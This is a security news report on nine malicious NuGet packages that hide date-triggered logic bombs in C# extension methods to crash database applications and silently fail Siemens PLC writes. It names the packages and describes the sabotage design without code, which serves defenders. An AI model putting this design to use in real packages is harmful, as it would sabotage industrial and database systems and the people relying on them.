A group of nine malicious NuGet packages has been discovered capable of deploying time-delayed payloads to disrupt database operations and compromise industrial control systems.
Socket, a software supply chain security firm, revealed that these packages were uploaded between 2023 and 2024 by a user named “shanhai666,” designed to execute malicious code on specific dates in August 2027 and November 2028. These packages had a combined download count of 9,488.
The most concerning package, Sharp7Extend, specifically targets industrial PLCs with two sabotage mechanisms: immediate random process termination and silent write failures that commence 30-90 minutes post-installation, impacting critical systems in manufacturing settings, according to security researcher Kush Pandya.
The list of malicious packages is as follows:
- MyDbRepository (Last updated on May 13, 2023)
- MCDbRepository (Last updated on June 5, 2024)
- Sharp7Extend (Last updated on August 14, 2024)
- SqlDbRepository (Last updated on October 24, 2024)
- SqlRepository (Last updated on October 25, 2024)
- SqlUnicornCoreTest (Last updated on October 26, 2024)
- SqlUnicornCore (Last updated on October 26, 2024)
- SqlUnicorn.Core (Last updated on October 27, 2024)
- SqlLiteRepository (Last updated on October 28, 2024)
Socket confirmed that all nine malicious packages function as advertised, allowing threat actors to gain trust among downstream developers who might unknowingly download them containing a logic bomb set to trigger in the future.
The threat actor released a total of 12 packages, with the remaining three being benign. Sharp7Extend, in particular, aims at users of the legitimate Sharp7 library, a .NET implementation for communicating with Siemens S7 PLCs.
While the inclusion of Sharp7 in the NuGet package may seem secure, the library secretly injects malicious code during database queries or PLC operations by exploiting C# extension methods.
“Extension methods enable developers to add new methods to existing types without altering the original code – a powerful feature in C# that the threat actor exploits for interception,” Pandya elaborated. “Each time an application executes a database query or PLC operation, these extension methods automatically run, comparing the current date with trigger dates (hardcoded in most packages, encrypted in Sharp7Extend).”
Once a trigger date passes, the malware has a 20% chance of terminating the entire application process. In the case of Sharp7Extend, the malicious logic triggers immediately post-installation, lasting until June 6, 2028, when the termination mechanism ceases.
The package also includes a feature to disrupt write operations to the PLC 80% of the time after a randomized delay ranging from 30 to 90 minutes. This indicates that both triggers – random process terminations and write failures – operate simultaneously once the grace period expires.
Additionally, specific SQL Server, PostgreSQL, and SQLite implementations linked to other packages are scheduled to trigger on August 8, 2027 (MCDbRepository) and November 29, 2028 (SqlUnicornCoreTest and SqlUnicornCore).
“This phased approach provides the threat actor with a longer timeframe to gather victims before the delayed-activation malware kicks in, while simultaneously disrupting industrial control systems,” Pandya noted.
The identity of the perpetrator behind this supply chain attack remains unknown, although Socket’s analysis of the source code and the use of the name “shanhai666” suggest a potential Chinese origin for the threat actor.
“This campaign showcases sophisticated techniques seldom seen in NuGet supply chain attacks,” the company concluded. “Developers who installed these packages in 2024 may have moved on to other projects or companies by 2027-2028 when the database malware triggers, and the 20% probabilistic execution masks systematic attacks as random crashes or hardware failures.”
“This complexity makes incident response and forensic investigation nearly impossible, as organizations cannot trace the malware back to its point of entry, identify the installer of the compromised dependency, or establish a clear compromise timeline, effectively erasing any trace of the attack.”
